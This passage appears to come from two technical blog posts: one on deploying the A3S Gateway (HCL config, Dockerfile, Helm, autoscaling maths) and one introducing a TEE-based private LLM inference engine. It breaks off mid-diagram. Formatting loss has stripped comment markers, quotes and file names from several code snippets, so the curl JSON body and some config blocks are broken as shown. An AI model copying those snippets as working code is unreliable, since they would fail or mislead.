Config hot reload	No (requires process reload)	Yes	Yes	Yes (zero downtime)
Deployment complexity	Simple	Simple	Requires control plane	Simple (single binary)
Runtime dependencies	OpenSSL	Go runtime	Dynamic linking	None (statically linked Rust)

Envoy is technically the closest, but its hidden cost of use is high: you need a control plane (Istio, xDS API), you need Kubernetes, you need an engineer who understands the Envoy configuration model. For a team whose core business is AI inference, maintaining a full Service Mesh is extra cognitive overhead.

A3S Gateway's design trade-off is: only do what an AI service traffic layer needs, fully described in an HCL config file, deployed as a single binary. No database, no control plane, no Kubernetes required (though supported).

10. In Practice: Configuring a Full Proxy for an AI Backend

At this point we understand why an AI-native gateway is needed. Here is a complete real-world example: deploying A3S Gateway in front of an Ollama LLM service, covering authentication, rate limiting, circuit breaking, streaming, and autoscaling.

Step 1: Write gateway.hcl

This config proxies a local Ollama instance and exposes it for external access. It adds JWT authentication, rate limiting at 60 requests per minute, a circuit breaker, and TLS termination:

# gateway.hcl

# ── Entrypoints ──────────────────────────────────────────────────────────
entrypoints "web" {
  address = "0.0.0.0:8080"   # HTTP (development / internal network)
}

entrypoints "websecure" {
  address = "0.0.0.0:443"    # HTTPS (production)
  tls {
    cert_file = "/etc/certs/fullchain.pem"
    key_file  = "/etc/certs/privkey.pem"
  }
}

# ── Routers ───────────────────────────────────────────────────────────────
# /v1/** → Ollama (OpenAI-compatible API)
routers "llm-api" {
  rule        = "PathPrefix(`/v1`)"
  service     = "ollama"
  entrypoints = ["websecure"]
  middlewares = ["jwt-auth", "rate-limit", "circuit-breaker"]
}

# /ws/** → WebSocket real-time inference (Agent scenarios)
routers "llm-ws" {
  rule        = "PathPrefix(`/ws`)"
  service     = "ollama"
  entrypoints = ["websecure"]
  middlewares = ["jwt-auth"]
}

# ── Backend Services ──────────────────────────────────────────────────────
services "ollama" {
  load_balancer {
    strategy = "least-connections"   # prefer the instance with the lowest current load
    servers = [
      { url = "http://127.0.0.1:11434", weight = 1 },
    ]
    health_check {
      path     = "/api/version"      # Ollama health endpoint
      interval = "15s"
    }

}

# Mirror 3% of real requests to the new model version for offline quality comparison
mirror {
service = "ollama-next"
percentage = 3
}

# Autoscaling: scale to zero when idle, auto scale-up when requests arrive
scaling {
min_replicas = 0 # allow scale-to-zero
max_replicas = 4 # up to 4 parallel inference instances
container_concurrency = 4 # each instance handles at most 4 concurrent requests
target_utilization = 0.7 # target utilization 70%
buffer_enabled = true # buffer requests during cold start, no 502
executor = "box" # A3S Box manages instance lifecycle
}
}

Shadow backend: receives mirrored traffic, does not affect the primary path

services "ollama-next" {
load_balancer {
strategy = "round-robin"
servers = [{ url = "http://127.0.0.1:11435" }]
}
}

── Middlewares ───────────────────────────────────────────────────────────

middlewares "jwt-auth" {
type = "jwt"
value = "${JWT_SECRET}" # read secret from environment variable
}

middlewares "rate-limit" {
type = "rate-limit"
rate = 60 # 60 requests per minute (token bucket)
burst = 10 # burst cap
}

middlewares "circuit-breaker" {
type = "circuit-breaker"
failure_threshold = 3 # 3 consecutive failures → open circuit
cooldown_secs = 30 # enter half-open state after 30 seconds
success_threshold = 2 # 2 successes → close circuit, resume normal
}

── Config Hot Reload ─────────────────────────────────────────────────────

providers {
file {
watch = true # auto-reload on file change, no restart needed
directory = "/etc/gateway/conf.d/"
}
}


Save as , then:

bash
a3s-gateway --config gateway.hcl


The gateway starts listening immediately, and any changes to the config file take effect within milliseconds.

---

### Step 2: Package as a Docker Image

If you want to package the gateway into a container (rather than using the Homebrew-installed binary directly), use the Dockerfile below. Note it is a two-stage build — the compile stage uses the Rust toolchain, the runtime stage only needs an Alpine base image:

dockerfile

── Build stage ───────────────────────────────────────────────────────────

FROM rust:alpine AS builder

RUN apk add --no-cache musl-dev cmake make perl g++ linux-headers

WORKDIR /build

Copy Cargo manifests first to warm the dependency cache (layer cache optimization)

COPY Cargo.toml Cargo.lock ./
RUN mkdir -p src && echo 'fn main(){}' > src/main.rs && touch src/lib.rs && cargo build --release 2>/dev/null || true && rm -rf src

Copy real source and build

COPY src/ src/
RUN touch src/main.rs src/lib.rs && cargo build --release

── Runtime stage ─────────────────────────────────────────────────────────

FROM alpine:3

RUN apk add --no-cache ca-certificates tzdata && addgroup -S gateway && adduser -S gateway -G gateway

COPY --from=builder /build/target/release/a3s-gateway /usr/local/bin/a3s-gateway
COPY gateway.hcl /etc/a3s-gateway/gateway.hcl

USER gateway

EXPOSE 8080 443

ENTRYPOINT ["a3s-gateway", "--config", "/etc/a3s-gateway/gateway.hcl"]


Build and run:

bash
docker build -t my-llm-gateway:latest .

docker run -d -p 8080:8080 -p 443:443 -v $(pwd)/certs:/etc/certs:ro -e JWT_SECRET=your-secret my-llm-gateway:latest


The final image is about 12 MB with no runtime dependencies.

---

### Step 3: Deploy With A3S Box (Single-Machine Sandbox)

[A3S Box](https://github.com/A3S-Lab/Box) is a microVM-based sandbox runtime. In scenarios where a full Kubernetes cluster is not needed — such as edge nodes, development machines, or resource-constrained single servers — Box can replace Docker Compose to manage the lifecycle of the gateway and LLM instances.

Box configuration is also HCL. Create :

hcl

box.hcl — run gateway + Ollama in microVM sandboxes

workloads "gateway" {
binary = "/usr/local/bin/a3s-gateway"
args = ["--config", "/etc/gateway/gateway.hcl"]

resources {
memory_mb = 512
cpus = 2
}

ports = [8080, 443]

env = {
JWT_SECRET = "${JWT_SECRET}"
RUST_LOG = "info,a3s_gateway=debug"
}

mounts {
host = "./gateway.hcl"
guest = "/etc/gateway/gateway.hcl"
readonly = true
}

mounts {
host = "./certs"
guest = "/etc/certs"
readonly = true
}

# Auto-restart if the gateway process crashes
restart = "always"
}

workloads "ollama" {
binary = "/usr/local/bin/ollama"
args = ["serve"]

resources {
memory_mb = 8192 # a 7B quantized model needs about 6 GB
cpus = 4
}

ports = [11434]

env = {
OLLAMA_MODELS = "/models"
}

mounts {
host = "/data/models"
guest = "/models"
}
}


Start:

bash

Install A3S Box

brew install a3s-lab/tap/a3s-box

Start all workloads

a3s-box run --config box.hcl

Check status

a3s-box status

View gateway logs

a3s-box logs gateway


Box's microVM isolation means: even if Ollama crashes due to OOM, the gateway process is unaffected — it triggers cold-start buffering, waits for Box to restart Ollama, then replays the queued requests.

---

### Step 4: Deploy to Kubernetes With Helm

For production environments requiring high availability and horizontal scaling, the Helm chart is the recommended deployment method.

Prepare  with the full HCL config embedded:

yaml

values-prod.yaml

image:
repository: ghcr.io/a3s-lab/gateway
tag: "0.2.2"
pullPolicy: Always

replicaCount: 2 # run 2 gateway replicas for high availability

service:
type: LoadBalancer # cloud provider LB, or pair with ingress-nginx
port: 8080

config: |
entrypoints "web" {
address = "0.0.0.0:8080"
}

routers "llm-api" {
rule = "PathPrefix(/v1)"
service = "ollama"
middlewares = ["jwt-auth", "rate-limit", "circuit-breaker"]
}

services "ollama" {
load_balancer {
strategy = "least-connections"
servers = [
{ url = "http://ollama-svc.ai.svc.cluster.local:11434" },
]
health_check {
path = "/api/version"
interval = "15s"
}
}
scaling {
min_replicas = 0
max_replicas = 4
container_concurrency = 4
target_utilization = 0.7
buffer_enabled = true
executor = "kube" # use kube executor to manage Pod replicas in K8s
}
}

middlewares "jwt-auth" {
type = "jwt"
value = "${JWT_SECRET}"
}

middlewares "rate-limit" {
type = "rate-limit"
rate = 60
burst = 10
}

middlewares "circuit-breaker" {
type = "circuit-breaker"
failure_threshold = 3
cooldown_secs = 30
success_threshold = 2
}


Deploy:

bash

Clone the repo (or find the chart path after brew install)

git clone https://github.com/A3S-Lab/Gateway.git
cd Gateway

Install

helm install llm-gateway deploy/helm/a3s-gateway -f values-prod.yaml --namespace ai --create-namespace --set-string "extraEnv[0].name=JWT_SECRET" --set-string "extraEnv[0].valueFrom.secretKeyRef.name=llm-secrets" --set-string "extraEnv[0].valueFrom.secretKeyRef.key=jwt-secret"

Upgrade config (hot reload, no Pod restart)

helm upgrade llm-gateway deploy/helm/a3s-gateway -f values-prod.yaml --namespace ai


Verify:

bash

Check gateway Pod status

kubectl get pods -n ai

Check dashboard

kubectl port-forward -n ai svc/llm-gateway 9090:8080
curl http://localhost:9090/api/gateway/health # health status
curl http://localhost:9090/api/gateway/routes # current routing table
curl http://localhost:9090/api/gateway/metrics # Prometheus metrics

Test streaming inference (should see tokens arriving one by one immediately)

curl -N http://localhost:9090/v1/chat/completions -H "Authorization: Bearer $JWT_TOKEN" -H "Content-Type: application/json" -d '{model:llama3,messages:[{role:user,content:Hello}],stream:true}'


---

## 11. Autoscaling: The Principles Behind the Numbers

The Knative autoscaling formula looks simple, but each parameter has a concrete physical meaning. Understanding these meanings is what lets you set the right parameters in real-world scenarios.

### The Formula

desired_replicas = ceil( (in_flight + queue_depth) / (container_concurrency x target_utilization) )


| Variable | Meaning |
|----------|---------|
|  | Total number of requests currently being processed across all instances |
|  | Number of requests waiting to be assigned to an instance (cold-start buffer queue) |
|  | Maximum number of requests an instance is allowed to handle simultaneously |
|  | Target utilization (0 to 1), reserving headroom for traffic spikes |

 is the most critical parameter — it must be set based on your model and hardware, not guessed. A rule of thumb:

container_concurrency ≈ GPU memory / peak memory per request


For example: a GPU with 24 GB of memory, running a 7B Q4 model (about 5 GB), with peak KV-cache per request of about 2 GB:

container_concurrency ≈ (24 - 5) / 2 ≈ 9


Setting it to 8 is conservative (leaving headroom for system overhead).

### Three Scenarios Walked Through

**Scenario 1: Idle → First Request Arrives (Cold Start)**

Initial state: replicas = 0, in_flight = 0, queue_depth = 0
desired = ceil(0 / (8 x 0.7)) = 0 ✓

t=0s: First request arrives
replicas = 0, in_flight = 0, queue_depth = 1
desired = ceil(1 / 5.6) = ceil(0.18) = 1
→ Scale-up triggered: start 1 instance, request enters buffer queue

t=45s: Instance passes health check, replicas = 1
Request dequeued → sent to instance
User receives first token


The user waited 45 seconds and saw a normal inference response, not an error.

**Scenario 2: Traffic Spike (Scale-Up Needed)**

Current state: replicas = 1, container_concurrency = 8, target_utilization = 0.7
effective capacity = 8 x 0.7 = 5.6 (scale-up triggers when requests exceed 6)

Spike to 20 concurrent requests:
in_flight = 8 (current instance is full)
queue_depth = 12 (waiting to be assigned)
desired = ceil((8 + 12) / 5.6) = ceil(20 / 5.6) = ceil(3.57) = 4

→ Scale from 1 instance to 4
→ 4 instances effective capacity = 4 x 5.6 = 22.4, can handle 20 concurrent requests
→ The 12 waiting requests are sent in order once new instances are ready (about 45s)


Note:  reserves 30% headroom, meaning scale-up begins when instances reach 70% utilization, not 100%. This is key for handling LLM inference latency — if you wait until instances are full before scaling, all new requests queue during the time it takes new instances to start.

**Scenario 3: Traffic Drops (Scale to Zero)**

Peak ends: replicas = 4, in_flight = 2, queue_depth = 0
desired = ceil(2 / 5.6) = ceil(0.36) = 1
→ Scale-down signal: target 1 instance

But scale-down has a cooldown period:
The gateway observes for 60 seconds (configurable), confirms traffic has truly dropped, then executes scale-down
→ Avoids thrashing (repeated scale-up/down) from brief traffic fluctuations

5 minutes later: in_flight = 0, queue_depth = 0
desired = 0
→ Scale to zero, GPU instance shuts down
→ Cost savings until the next request arrives




### Tuning Recommendations

| Parameter | Conservative | Aggressive | Use Case |
|-----------|-------------|------------|----------|
| `container_concurrency` | 50% of GPU memory capacity | 80% of GPU memory capacity | Conservative: stability first; Aggressive: cost first |
| `target_utilization` | 0.6 | 0.8 | Conservative: handle traffic spikes; Aggressive: latency tolerance is low priority |
| `min_replicas` | 1 (keep one warm instance) | 0 (allow cold start) | Conservative: cost vs latency-sensitive workloads; Aggressive: offline / low-frequency workloads |
| `max_replicas` | Number of GPUs | Number of GPUs x 2 (overcommit) | Depends on budget ceiling |

A common mistake is setting `target_utilization` to 1.0 — trying to fully utilize every instance's memory. The problem is that when utilization hits 100%, scale-up only then begins, and GPU instances take 30–60 seconds to start. During that window, all new requests wait. `0.7` means scale-up begins when instances still have 30% headroom, so new instances are ready before old ones are fully saturated.

---

The core challenge of AI infrastructure is not the model itself — it is the pipes that connect the model to the real world. The traffic layer is the most foundational of those pipes, and the most easily overlooked.

Using tools designed for the Web era to carry AI services is like using water pipes to transport natural gas: it might run in the short term, but every assumption is accumulating risk.

Redesigning the traffic layer from the actual requirements of AI services is an unavoidable step in modernizing AI infrastructure.

A Privacy LLM Inference Engine That Runs on $10 Hardware

Roy Lin — Mon, 23 Feb 2026 18:28:47 +0000

Three facts define the problem A3S Power was built to solve:

One: Every prompt you send to any LLM inference server exists in plaintext in server memory. Ollama, vLLM, TGI, llama.cpp — no exceptions. Operators promise they "won't look," but that's policy, not physics.

Two: A quantized 10B-parameter model requires 6GB of memory. TEE (Trusted Execution Environment) encrypted memory is typically only 256MB. Traditional inference engines under this constraint can only run 0.5B toy models — incapable of any real security decision-making.

Three: A $10 piece of hardware with 256MB of memory can run a 10B model through layer-streaming inference. That model is powerful enough to do three critical things inside hardware-encrypted memory: security validation (detecting prompt injection), intelligent data redaction (distinguishing sensitive from public information), and sensitive tool call approval (determining whether an Agent's actions exceed authorization).

The intersection of these three facts is the question A3S Power tries to answer: Can we use hardware encryption to protect every prompt on $10 hardware, while running a model smart enough to make security decisions? Our answer is yes.

This article follows a real prompt — a client portfolio analysis request sent by an investment bank trader — through its complete journey inside A3S Power. At each security layer, we stop and look at what was done, why it was done, and what the code looks like.

Your Prompt Is Running Naked in Server Memory
Gate One: A Hardware Attestation Hidden Inside the TLS Handshake
Gate Two: Hardware Locks Memory in a Safe
How Do You Know Which Model the Server Is Running?
Running a 10B Model in 256MB — The Secret of picolm Layer-Streaming Inference
Logs, Error Messages, Token Counts — Every One Can Betray You
Model Weights Are Also Confidential: Three Encrypted Loading Modes
How Can the Client Verify All of This Itself?
Six-Layer Architecture: What's Inside
Why Pure Rust? The Trust Ledger of Supply Chain Auditing
Compared to Ollama, vLLM, TGI — Where's the Gap?
If You Need to Deploy Today

1. Your Prompt Is Running Naked in Server Memory

First, let's look at what that prompt looks like:

"Client [Name], account ending in 8832, holds 500,000 shares of AAPL at a cost basis of $142.7, with a current unrealized gain of $120M. Please analyze hedging strategies under Fed rate hike expectations and assess the market impact of a large block sale."

This prompt travels through an HTTPS tunnel to the inference server. TLS terminates. From this moment on, the client's name, account information, position size, and trading strategy — all of it lies in plaintext in server memory.

A prompt goes through five stages inside an inference server:

Network transit: Protected by HTTPS, no problem
Memory decryption: TLS terminates, prompt becomes plaintext — the problem starts here
Inference computation: tokenize → matrix operations → generate response, all in plaintext
Log recording: prompt and response may be written to log files
Memory residue: the request is done, but the data still sits in memory waiting to be overwritten

Disk encryption protects data at rest. TLS protects data in transit. But who protects data being processed? Nobody.

This isn't a theoretical risk:

Finance (SOX/GLBA) — Leaked trading strategies and client positions mean insider trading or market manipulation. Regulators want auditable technical guarantees, not verbal promises
Healthcare (HIPAA) — Cloud provider administrators can theoretically read all patient data
Government and Defense — Classified information has strict physical isolation requirements; traditional inference servers cannot prove data wasn't leaked
Multi-tenant AI platforms — A single memory boundary vulnerability can break tenant isolation

The trust model of traditional solutions:

You trust → Cloud provider → won't read your memory
You trust → Inference server operator → won't log your prompt
You trust → System administrators → won't export memory snapshots
You trust → Everyone with physical access → won't perform cold boot attacks

Every layer of trust is an assumption. More assumptions means a more fragile system.

A3S Power's answer: Replace trust assumptions with cryptographic verification, replace policy promises with hardware enforcement. And this protection doesn't require expensive infrastructure — a $10 piece of hardware with 256MB of memory can run it.

Now let that prompt continue its journey.

2. Gate One: A Hardware Attestation Hidden Inside the TLS Handshake

The Problem: There's a Time Gap Between Verification and Communication

Traditional remote attestation schemes split attestation and communication into two steps: first verify the server's identity, then establish a TLS connection to send data. Sounds reasonable?

It's not. There's a time window between these two steps — a TOCTOU (Time-of-Check-Time-of-Use) vulnerability. You verified server A, but in the instant you establish the connection, an attacker may have already swapped A for B. Your prompt was sent to a server you never verified.

How A3S Power Solves It: RA-TLS

RA-TLS (Remote Attestation TLS) embeds the attestation report directly into the X.509 extension fields of the TLS certificate. Remote attestation completes simultaneously with the TLS handshake — no time window, no TOCTOU.

First, the config — three lines:

tee_mode = true
tls_port = 11443
ra_tls   = true

A3S Power's RA-TLS implementation details:

Self-signed ECDSA P-256 certificate: A new certificate is generated each time the server starts, valid for 365 days
Custom X.509 extension: OID 1.3.6.1.4.1.56560.1.1, containing a JSON-encoded attestation report
SAN (Subject Alternative Names): Always includes localhost + 127.0.0.1 + ::1, with support for additional DNS names or IP addresses

When the client for that trading analysis prompt initiates a TLS connection, it can extract the OID 1.3.6.1.4.1.56560.1.1 extension from the certificate, parse the JSON attestation report, and verify it with the Verify SDK. The entire process completes during the handshake — verification fails? The connection terminates immediately, and not a single byte of the prompt is sent.

There's Also a More Hidden Channel: Vsock

When A3S Power runs inside an a3s-box MicroVM, it doesn't use TCP/IP — it communicates with the host via Vsock (Virtio Socket):

Zero configuration: No IP addresses, routing tables, or firewall rules needed
Secure: The communication channel doesn't go through the network stack; network-layer attackers can't intercept it
High performance: virtio-based shared memory transport with extremely low latency

A3S Power uses the same axum router to handle both Vsock and TCP requests — all middleware (rate limiting, authentication, auditing) applies equally to Vsock.

The TLS handshake is complete. That prompt has now entered the server. Next it will discover that the memory space it's in is completely different from a normal server.

3. Gate Two: Hardware Locks Memory in a Safe

The Problem: Software Isolation Isn't Hard Enough

The OS's memory protection is at the software level. A kernel vulnerability, a privilege escalation, a malicious hypervisor — all can bypass it. In cloud environments, your virtual machine runs on someone else's physical machine, and the hypervisor has the right to read all your memory.

This isn't a question of trust — it's a fundamental architectural flaw.

How A3S Power Solves It: TEE Hardware Isolation

TEE (Trusted Execution Environment) creates an encrypted execution environment at the processor level:

Memory encryption: All memory data is encrypted by hardware AES keys, managed by the processor's secure processor (PSP/SGX), inaccessible to the OS and VMM
Integrity protection: Hardware prevents external entities from tampering with memory contents inside the TEE
Remote attestation: The TEE can generate hardware-signed attestation reports proving its identity and the integrity of its runtime environment

Current mainstream TEE technologies:

Technology	Vendor	Isolation Granularity	Memory Encryption	Attestation Mechanism
AMD SEV-SNP	AMD	VM-level	AES-128/256	SNP_GET_REPORT ioctl
Intel TDX	Intel	VM-level	AES-128	TDX_CMD_GET_REPORT0 ioctl
Intel SGX	Intel	Process-level	AES-128	EREPORT/EGETKEY

A3S Power supports AMD SEV-SNP and Intel TDX, and provides a simulation mode for development and testing.

Auto-Detection, Zero Configuration

A3S Power automatically detects the TEE environment at startup — no manual specification needed:

Check for /dev/sev-guest device file → AMD SEV-SNP
Check for /dev/tdx-guest or /dev/tdx_guest device file → Intel TDX
Check for A3S_TEE_SIMULATE=1 environment variable → Simulation mode
None of the above → No TEE

The same binary runs in both TEE and non-TEE environments — TEE environments automatically enable hardware protection, development environments use simulation mode for testing.

TEE Is Not a Feature, It's a Cross-Cutting Concern

Many people think TEE support just means adding an attestation endpoint. It's not. In A3S Power, TEE security permeates every layer:

Layer           TEE Integration
──────────────  ──────────────────────────────────────────────────────
API             Log redaction, buffer zeroing, token count fuzzing, timing padding,
                attestation endpoint (nonce + model binding)

Server          Encrypted audit logs (AES-256-GCM), constant-time auth,
                RAII decrypted model storage, RA-TLS cert (X.509 attestation ext),
                TEE-specific Prometheus counters

Backend         EPC-aware routing (auto-switch to picolm when model > 75% EPC),
                per-request KV cache isolation, mlock weight pinning

Model           SHA-256 content-addressed storage, GGUF memory estimation (EPC budget planning)

TEE             Attestation (SEV-SNP/TDX ioctl), AES-256-GCM encryption (3 modes),
                Ed25519 model signing, key rotation, policy enforcement, log redaction (10 keys),
                SensitiveString (auto-zeroing), EPC memory detection

Verify          Client: nonce binding, model hash binding, measurement checks (all constant-time),
                hardware signature verification (AMD KDS / Intel PCS certificate chain)

That prompt is now safely resting in hardware-encrypted memory. But a new problem has emerged — how do you know the model processing this prompt is really the one you think it is?

4. How Do You Know Which Model the Server Is Running?

The Problem: Model Identity Is a Black Box

You send a request to an endpoint claiming to run "llama-3.2-3b." But how do you verify it? The operator might:

Replace the claimed model with a smaller, cheaper one (to save money)
Replace the original model with a backdoored one (to steal data)
Replace the original model with a fine-tuned one (to manipulate output)

API behavior might look completely normal — you can't reliably distinguish different models from their output.

How A3S Power Solves It: Two-Layer Model Integrity + Hardware Attestation Binding

Layer one: SHA-256 hash verification. When tee_mode = true, each model file's hash is verified at startup. No match? Refuse to start.

tee_mode = true
model_hashes = {
  "llama3.2:3b" = "sha256:a1b2c3d4e5f6..."
  "qwen2.5:7b"  = "sha256:def456789abc..."
}

Layer two: Ed25519 signature verification. The model publisher signs the model file with an Ed25519 private key; the signature is stored at <model_path>.sig (64-byte raw signature). Verification happens at load time — confirming not only that the model hasn't been tampered with, but also that it genuinely came from the claimed publisher.

model_signing_key = "a1b2c3d4..."  # Ed25519 public key (hex-encoded, 32 bytes)

But these two layers only solve the server-side problem. How does the client know the server actually did these verifications?

The answer: model attestation binding.

When the client requests GET /v1/attestation?nonce=<hex>&model=<name>, A3S Power embeds the model's SHA-256 hash into the report_data field of the hardware attestation report:

Client sends GET /v1/attestation?nonce=<hex>&model=<name>
    │
    ▼
Build report_data (64 bytes)
    ├── [0..32]  = nonce (client-provided, prevents replay)
    └── [32..64] = SHA-256(model_file) (model hash, proves model identity)
    │
    ▼
Call hardware ioctl
    ├── AMD: SNP_GET_REPORT → /dev/sev-guest
    │   Report offset 0x50: report_data (64 bytes)
    │   Report offset 0x90: measurement (48 bytes, SHA-384)
    │   Report offset 0x1A0: chip_id (64 bytes)
    │
    └── Intel: TDX_CMD_GET_REPORT0 → /dev/tdx-guest
        TDREPORT offset 64: reportdata (64 bytes)
        TDREPORT offset 528: MRTD (48 bytes)
    │
    ▼
Return AttestationReport {
    tee_type: "sev-snp" | "tdx" | "simulated",
    report_data: [u8; 64],      // nonce + model_hash
    measurement: [u8; 48],      // platform boot measurement
    raw_report: Vec<u8>,        // full firmware report (for independent client verification)
}

The key is the layout of report_data: [nonce(32)][model_sha256(32)]. These 64 bytes are protected by hardware signatures, meaning:

Nonce binding: A different nonce each time prevents replay of old attestation reports
Model binding: The model's SHA-256 hash is locked by hardware signature. Swap the model? The attestation immediately becomes invalid

The client verifies three things to confirm model identity:

The attestation report is genuinely signed by TEE hardware (via AMD KDS / Intel PCS certificate chain)
report_data[32..64] equals the expected model SHA-256 hash
report_data[0..32] equals the nonce the client sent

Three steps form a complete chain of trust: hardware attestation → platform integrity → model identity → request freshness.

This is A3S Power's unique innovation — other inference servers don't even have an attestation endpoint, let alone model attestation binding.

The model identity is confirmed. But inference hasn't started yet. Because there's still a tricky engineering problem — the TEE's memory is too small.

5. Running a 10B Model in 256MB — The Secret of picolm Layer-Streaming Inference

The Problem: The Model Doesn't Fit in Cheap Hardware

A harsh reality of privacy inference: TEE environments typically have only 256MB to 512MB of EPC (Encrypted Page Cache). More broadly, if you want to run privacy inference on a $10 edge device — say, an embedded board with 256MB of memory — traditional inference engines will sentence you to death.

A 10B-parameter Q4_K_M quantized model requires about 6GB of memory. 6GB model, 256MB memory. 24x difference. It won't fit.

The traditional solution is to use smaller models or more aggressive quantization. But this significantly degrades inference quality — and in security scenarios, model quality directly determines the ceiling of security capabilities (more on why later).

A3S Power's answer: you don't need expensive hardware, you need a smarter inference approach.

How A3S Power Solves It: picolm Layer-Streaming Inference

The core insight is actually simple: at any given moment, the forward pass only needs the weights of one layer. After processing layer N, layer N's weights are no longer needed — release them, load layer N+1.

Traditional inference (mistralrs / llama.cpp):
┌──────────────────────────────────────────────────┐
│  All 48 layers loaded in memory simultaneously    │
│  Peak memory ≈ model_size (e.g. 10B Q4_K_M ~6GB) │
└──────────────────────────────────────────────────┘

picolm layer-streaming inference:
┌──────────────────────────────────────────────────┐
│  mmap(model.gguf)  ← virtual address space only  │
│                       no physical memory alloc    │
│                                                   │
│  for layer in 0..n_layers:                        │
│    ┌─────────────────────────┐                    │
│    │ blk.{layer}.* tensors   │ ← OS pages in      │
│    │ (~125 MB for 10B Q4_K_M)│   weights on demand│
│    └─────────────────────────┘                    │
│    forward_pass(hidden_state, layer_weights)       │
│    madvise(MADV_DONTNEED) ← release physical pages │
│                                                   │
│  Peak memory ≈ layer_size + KV cache (FP16)       │
│             ≈ 125 MB + 68 MB (10B, 2048 ctx)      │
└──────────────────────────────────────────────────┘

Two Key Components — Let's Look at the Code

Component one: gguf_stream.rs — Zero-copy GGUF parser

Opens the GGUF file via mmap(MAP_PRIVATE | PROT_READ). Parses the header (v2/v3), metadata, and tensor descriptors — but loads no weight data. Each tensor is recorded as an (offset, size) pair within the mmap region.

When picolm requests a layer's weights, tensor_bytes(name) returns a &[u8] slice pointing directly into the mmap — zero copy, zero allocation. The OS kernel pages in data on demand and automatically reclaims it under memory pressure.

GGUF file (on disk):
┌────────┬──────────┬──────────────────────────────────┐
│ Header │ Metadata │ Tensor Data (aligned)             │
│ 8 bytes│ variable │ blk.0.attn_q | blk.0.attn_k | ...│
└────────┴──────────┴──────────────────────────────────┘
                          ↑
                    mmap returns &[u8] slice
                    pointing directly here
                    (no memcpy, no allocation)

Component two: picolm.rs + picolm_ops/ — Layer-streaming forward pass

Iterates from blk.0.* to blk.{n-1}.*, applying each layer's weights to the hidden state. After processing layer N, madvise(MADV_DONTNEED) explicitly releases physical pages.

// Simplified flow (actual code in src/backend/picolm.rs)
let gguf = GgufFile::open("model.gguf")?;  // mmap, only parses header
let tc = TensorCache::build(&gguf, n_layers)?;  // one-time parse of tensor pointers
let rope_table = RopeTable::new(max_seq, head_dim, rope_dim, theta);
let mut hidden = vec![0.0f32; n_embd];
let mut buf = ForwardBuffers::new(/* pre-allocate all working buffers */);

for layer in 0..n_layers {
    attention_layer(&mut hidden, &tc, layer, pos, kv_cache, &rope_table, &mut buf)?;
    ffn_layer(&mut hidden, &tc, layer, activation, &mut buf)?;
    tc.release_layer(&gguf, layer);  // madvise(DONTNEED) — release physical pages
}

Six Key Optimizations on the Hot Path

TensorCache: All tensor byte slices and types are parsed once at load time into flat arrays. Hot path uses layer * 10 + slot indexing — zero string formatting, zero HashMap lookups
ForwardBuffers: All working buffers (q, k, v, gate, up, down, normed, logits, scores, attn_out) pre-allocated once. Zero heap allocation during inference
Fused vec_dot: Dequantization + dot product in a single pass — no intermediate f32 buffer. Dedicated kernels for Q4_K, Q6_K, Q8_0
Rayon parallel matrix multiply: Matrices with more than 64 rows use multi-threaded row parallelism
FP16 KV cache: Keys and values stored as f16, converted on read. KV cache memory halved
Pre-computed RoPE: cos/sin tables built at load time. No transcendental functions on the hot path

Real-World Memory Comparison

Model	Traditional	picolm Layer-Streaming	Reduction
0.5B Q4_K_M (~350 MB)	~350 MB	~15 MB + KV	23x
3B Q4_K_M (~2 GB)	~2 GB	~60 MB + KV	33x
7B Q4_K_M (~4 GB)	~4 GB	~120 MB + KV	33x
10B Q4_K_M (~6 GB)	~6 GB	~125 MB + KV	48x
13B Q4_K_M (~7 GB)	~7 GB	~200 MB + KV	35x
70B Q4_K_M (~40 GB)	~40 GB	~1.1 GB + KV	36x

KV cache uses FP16 storage (half the memory of F32). A 10B model at 2048 context length is about 68 MB.

A 10B model under picolm has a peak memory of about 193 MB (125 MB layer weights + 68 MB KV cache), fully runnable in 256 MB of memory. This means a $10 edge device, a TEE VM with 256MB EPC, or even a memory-constrained container — all can run a 10B model with genuine semantic understanding capability. This is picolm's core value — not "barely runs," but making privacy inference accessible on any hardware.

Why Is a 10B Model Critical? Not Just "Can Run," But "Can Work"

You might ask: wouldn't a 0.5B small model inside the TEE be enough? Why specifically 10B?

Because 10B is a critical capability threshold. In A3S's security architecture, the LLM inside the TEE doesn't just answer questions — it carries three core security responsibilities:

Responsibility one: Safety Gate. In an Agent execution chain, every operation needs security review — does the user's input contain injection attacks? Does the Agent-generated code have malicious behavior? Are the tool call parameters reasonable? These judgments require sufficient language understanding capability. A 0.5B model can do simple keyword matching, but against carefully crafted adversarial inputs (like multi-layered nested prompt injection), its judgment is far from adequate. A 10B model has genuine semantic understanding, capable of identifying complex attack patterns that "look harmless but are actually attempting privilege escalation."

Responsibility two: Data Redaction and Distribution (Privacy Router). When sensitive data needs to leave the TEE boundary — such as sending inference results to external services, or writing logs to persistent storage — the data must first be redacted. This isn't simple regex replacement. A text containing "Client [Name], account ending in 8832, holds 500,000 shares of AAPL, unrealized gain $120M" requires the model to understand which parts are retainable public market information (AAPL ticker symbol) and which must be redacted as client privacy ([Name], account number, position size). A 10B model can perform context-aware intelligent redaction, rather than crudely marking the entire text as sensitive. Only redacted data can be safely distributed to downstream systems outside the TEE.

Here's a concrete example. Suppose an AI Agent needs to query a database for client information to answer an analyst's question:

Analyst query: "Help me find clients with large redemptions in the past week and analyze possible reasons"

Agent executes inside TEE:
┌─────────────────────────────────────────────────────────────────┐
│  TEE encrypted memory (hardware-isolated, unreadable externally) │
│                                                                   │
│  1. Agent calls SQL tool to query database:                       │
│     SELECT name, account_id, amount, fund_name, redeem_date       │
│     FROM redemptions WHERE amount > 1000000                       │
│     AND redeem_date > NOW() - INTERVAL 7 DAY                     │
│                                                                   │
│  2. Database returns raw data (inside TEE, plaintext is safe):    │
│     ┌──────────────────────────────────────────────────────┐      │
│     │ [Client A] | 6621-8832 | $520,000  | Stable Growth A | 02-18│
│     │ [Client B] | 6621-4471 | $380,000  | Tech Pioneer B  | 02-19│
│     │ [Client C] | 6621-9953 | $1,200,000| Stable Growth A | 02-20│
│     └──────────────────────────────────────────────────────┘      │
│                                                                   │
│  3. 10B model analyzes data, generates insight (inside TEE):      │
│     "Stable Growth A fund saw concentrated redemptions            │
│      Feb 18-20, totaling $2.1M across 2 clients.                 │
│      Possible reason: fund NAV declined 3.2%, triggering          │
│      stop-loss thresholds."                                       │
│                                                                   │
│  4. 10B model performs intelligent redaction on output (key step):│
│     ┌──────────────────────────────────────────────────────┐      │
│     │ Retain: fund name (public info), redemption trend,   │      │
│     │         time range, aggregate amount, analysis        │      │
│     │ Redact: client names → [Client A/B/C],               │      │
